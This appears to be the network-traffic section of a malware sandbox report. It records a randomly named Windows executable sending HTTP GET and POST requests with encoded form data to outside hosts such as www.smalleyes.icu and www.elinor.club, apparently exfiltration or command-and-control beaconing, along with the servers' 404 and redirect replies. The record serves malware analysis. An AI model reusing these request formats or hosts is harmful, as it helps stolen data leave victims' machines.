                                                            Jan 11, 2025 05:43:57.289916992 CET540OUTGET /1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.elinor.club
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:43:57.983772993 CET480INHTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:43:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Location: http://elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.1049986134.122.191.187806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:03.421796083 CET804OUTPOST /s6zh/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.smalleyes.icu
                                                            Origin: http://www.smalleyes.icu
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 49 57 2f 53 6b 75 4d 37 69 36 50 6d 46 64 57 31 4e 33 35 41 6a 50 4e 71 63 61 53 66 61 46 57 38 53 33 68 72 53 64 75 53 76 78 2f 45 54 6e 74 55 71 53 62 35 4d 43 42 72 70 34 78 66 6c 56 62 70 4e 35 76 47 36 44 46 56 4f 2f 39 4c 45 44 6d 46 74 37 55 4f 35 6b 34 36 41 4f 71 4f 2b 49 46 68 4e 69 53 6d 6b 35 6b 49 45 51 58 4c 38 52 65 6d 75 4b 43 30 52 6e 4b 6c 57 2f 6a 6c 63 69 6b 35 47 72 78 59 74 45 5a 34 50 56 78 45 6a 62 7a 4c 6c 50 43 71 75 30 37 37 58 2f 53 39 38 75 76 72 75 50 61 55 32 4a 53 33 7a 41 55 2f 30 6b 76 56
                                                            Data Ascii: rFbdy=6nn7X8LHMfZVIW/SkuM7i6PmFdW1N35AjPNqcaSfaFW8S3hrSduSvx/ETntUqSb5MCBrp4xflVbpN5vG6DFVO/9LEDmFt7UO5k46AOqO+IFhNiSmk5kIEQXL8RemuKC0RnKlW/jlcik5GrxYtEZ4PVxEjbzLlPCqu077X/S98uvruPaU2JS3zAU/0kvV
                                                            Jan 11, 2025 05:44:04.341135025 CET1236INHTTP/1.1 404 Not Found
                                                            Server: kangle/3.5
                                                            Date: Sat, 11 Jan 2025 04:32:03 GMT
                                                            Set-Cookie: home_lang=cn; path=/
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Cache: MISS from kangle web server
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e [TRUNCATED]
                                                            Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                            Jan 11, 2025 05:44:04.341156960 CET224INData Raw: 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 70 6c 34 38 20 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 38 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74
                                                            Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                            Jan 11, 2025 05:44:04.341166019 CET1236INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 34 63 37 66 35 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 62 74 6e 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 69
                                                            Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                            Jan 11, 2025 05:44:04.341171026 CET500INData Raw: 72 76 61 6c 28 69 6e 74 65 72 76 61 6c 43 44 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 69 66 20 28 6f 53 65 63 73 20 3d 3d 20 30 29 7b 0d 0a 20
                                                            Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.1049987134.122.191.187806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:05.968800068 CET828OUTPOST /s6zh/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.smalleyes.icu
                                                            Origin: http://www.smalleyes.icu
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 4f 31 6e 53 6d 4a 67 37 7a 61 50 70 4b 39 57 31 44 58 35 45 6a 4f 78 71 63 5a 66 61 61 33 43 38 53 57 52 72 54 63 75 53 73 78 2f 45 63 48 74 52 6c 79 62 32 4d 43 46 4e 70 35 39 66 6c 56 2f 70 4e 34 66 47 36 77 64 4b 55 50 39 4a 43 44 6d 48 6a 62 55 4f 35 6b 34 36 41 4f 75 67 2b 4f 74 68 4e 52 4b 6d 32 73 51 4c 48 51 58 49 72 68 65 6d 71 4b 43 77 52 6e 4b 48 57 36 66 4c 63 68 4d 35 47 72 42 59 74 32 68 37 47 56 77 50 75 37 79 4b 31 2f 6d 75 69 57 62 2b 54 63 7a 33 6f 64 57 58 6b 4f 6e 54 6e 59 7a 67 67 33 49 78 36 69 61 2f 6b 42 4b 46 31 6b 39 62 35 57 32 63 45 55 55 45 64 55 44 69 47 67 3d 3d
                                                            Data Ascii: rFbdy=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa3C8SWRrTcuSsx/EcHtRlyb2MCFNp59flV/pN4fG6wdKUP9JCDmHjbUO5k46AOug+OthNRKm2sQLHQXIrhemqKCwRnKHW6fLchM5GrBYt2h7GVwPu7yK1/muiWb+Tcz3odWXkOnTnYzgg3Ix6ia/kBKF1k9b5W2cEUUEdUDiGg==
                                                            Jan 11, 2025 05:44:06.880609035 CET1236INHTTP/1.1 404 Not Found
                                                            Server: kangle/3.5
                                                            Date: Sat, 11 Jan 2025 04:32:06 GMT
                                                            Set-Cookie: home_lang=cn; path=/
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Cache: MISS from kangle web server
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e [TRUNCATED]
                                                            Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                            Jan 11, 2025 05:44:06.880630970 CET224INData Raw: 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 70 6c 34 38 20 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 38 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74
                                                            Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                            Jan 11, 2025 05:44:06.880644083 CET1236INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 34 63 37 66 35 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 62 74 6e 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 69
                                                            Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                            Jan 11, 2025 05:44:06.880660057 CET500INData Raw: 72 76 61 6c 28 69 6e 74 65 72 76 61 6c 43 44 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 69 66 20 28 6f 53 65 63 73 20 3d 3d 20 30 29 7b 0d 0a 20
                                                            Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.1049988134.122.191.187806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:08.523514986 CET1841OUTPOST /s6zh/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.smalleyes.icu
                                                            Origin: http://www.smalleyes.icu
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 4f 31 6e 53 6d 4a 67 37 7a 61 50 70 4b 39 57 31 44 58 35 45 6a 4f 78 71 63 5a 66 61 61 33 36 38 53 6b 4a 72 54 37 53 53 74 78 2f 45 43 58 74 51 6c 79 62 52 4d 47 68 4a 70 35 68 70 6c 58 33 70 4e 66 33 47 38 42 64 4b 42 66 39 4a 41 44 6d 47 74 37 56 47 35 6b 6f 6d 41 4f 2b 67 2b 4f 74 68 4e 55 47 6d 6d 4a 6b 4c 42 51 58 4c 38 52 65 79 75 4b 43 59 52 6b 36 74 57 37 72 31 66 52 73 35 44 2f 6c 59 39 54 31 37 4e 56 77 4e 67 62 7a 5a 31 2f 62 77 69 57 58 49 54 64 57 63 6f 65 32 58 70 37 57 59 36 5a 44 6b 7a 47 45 53 34 78 43 69 76 31 4f 33 79 57 6b 46 32 48 75 57 52 31 4e 41 51 31 37 73 45 5a 65 6a 39 45 68 52 35 42 58 54 6d 62 4a 4d 6d 47 62 72 50 37 64 54 32 30 2b 36 4f 2f 51 53 53 4a 38 62 56 4f 69 74 50 4c 44 58 61 39 4b 76 30 59 69 45 6c 4d 43 6d 6d 64 76 56 59 4a 6d 66 44 34 37 61 55 4c 33 41 66 69 6c 78 2b 32 49 47 46 2b 48 47 48 39 77 66 79 42 5a 4d 47 41 59 5a 61 64 2f 67 2f 42 2f 6d 57 63 53 78 33 6d 7a 38 7a 53 2f 4f 37 59 55 39 63 6f 50 6d [TRUNCATED]
                                                            Data Ascii: rFbdy=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa368SkJrT7SStx/ECXtQlybRMGhJp5hplX3pNf3G8BdKBf9JADmGt7VG5komAO+g+OthNUGmmJkLBQXL8ReyuKCYRk6tW7r1fRs5D/lY9T17NVwNgbzZ1/bwiWXITdWcoe2Xp7WY6ZDkzGES4xCiv1O3yWkF2HuWR1NAQ17sEZej9EhR5BXTmbJMmGbrP7dT20+6O/QSSJ8bVOitPLDXa9Kv0YiElMCmmdvVYJmfD47aUL3Afilx+2IGF+HGH9wfyBZMGAYZad/g/B/mWcSx3mz8zS/O7YU9coPmcDkR8xuwKOABgQqatEMSI99QRNh2i5LTQU3H7VUlsoN2kRttkCIgkx9qdBLMskjcOO5vZYOGBeqN16BS4anpnZz3hjqAzP7jVrnfSHVAVbQSNqQJSFgAuyVELSWHhsPmnGOaV2/bd0ccVXUeBHCrITnsH3NV5FCTXDtDbT3DUGDv3NPMdN45IYzTJSagzb5kqY7fr6hJ40+Pj5R0948hw7liyOnuNj2i6PdvgmiW0knSGuF4knc6Tl6YRnzR06WsyzhyP2VgwH9nZd2og+A5R9/ITInGGlUFGUvV0TXF8k9BTmbkTkYCNlaejxmwBbmtmxnrGuI5mSnn3yTI60Wy36O9GAEaTBc7kEVEHjVkTKuErPOlTtsv8zGzN4wmYvEtVkdgzumwt4mp2I5VpUpkXYxrVndZzlJAxPwiM981Q/uWZoLykW9pCYaYVgF3EBjwqfZDSurfuDwgtj+2pjFut33dxBcfleKCUDwRFSNnNousXr3BWqilxHzvTWUzyLIxR4H4gHwIZ0sHMxXem3DyC4WdYPSgdcTCnJt/4mQEC0xgBzO7Y2NqlwG+FSH5OjW2KjSViQ399SOSbAjwt22bqsXkG0kkPue/Wjf9AE+75pI3/Y8cPM7ErcNksIahRZhWcP+AazcWLzwEksWH0X/yBpJ9+uKbFLN1ZD [TRUNCATED]
                                                            Jan 11, 2025 05:44:09.419831038 CET1236INHTTP/1.1 404 Not Found
                                                            Server: kangle/3.5
                                                            Date: Sat, 11 Jan 2025 04:32:08 GMT
                                                            Set-Cookie: home_lang=cn; path=/
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Cache: MISS from kangle web server
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e [TRUNCATED]
                                                            Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                            Jan 11, 2025 05:44:09.419848919 CET224INData Raw: 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 70 6c 34 38 20 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 38 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74
                                                            Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                            Jan 11, 2025 05:44:09.419859886 CET1236INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 34 63 37 66 35 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 62 74 6e 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 69
                                                            Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                            Jan 11, 2025 05:44:09.419919014 CET224INData Raw: 72 76 61 6c 28 69 6e 74 65 72 76 61 6c 43 44 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 69 66 20 28 6f 53 65 63 73 20 3d 3d 20 30 29 7b 0d 0a 20
                                                            Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown
                                                            Jan 11, 2025 05:44:09.419929981 CET276INData Raw: 27 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 6f 53 65 63 73 3b 0d 0a 20 20 7d 0d 0a 20 0d 0a 20 76 61 72 20 69 6e 74 65 72 76 61 6c 44 6f 6d 49 44 20 3d 20 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20
                                                            Data Ascii: ').innerHTML = oSecs; } var intervalDomID = setInterval(function () { if (document.getElementById('J_countdown')) { clearInterval(intervalDomID); intervalCD = setInterval(time, 1000); } }, 100);<


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.1049989134.122.191.187806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:11.070925951 CET542OUTGET /s6zh/?rFbdy=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsBqJqOmuwjboa7nAzI9uQyNNQORSZ1w==&UPxHl=S80HqRlhn HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.smalleyes.icu
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:11.998029947 CET1236INHTTP/1.1 404 Not Found
                                                            Server: kangle/3.5
                                                            Date: Sat, 11 Jan 2025 04:32:11 GMT
                                                            Set-Cookie: home_lang=cn; path=/
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Cache: MISS from kangle web server
                                                            Transfer-Encoding: chunked
                                                            Connection: close
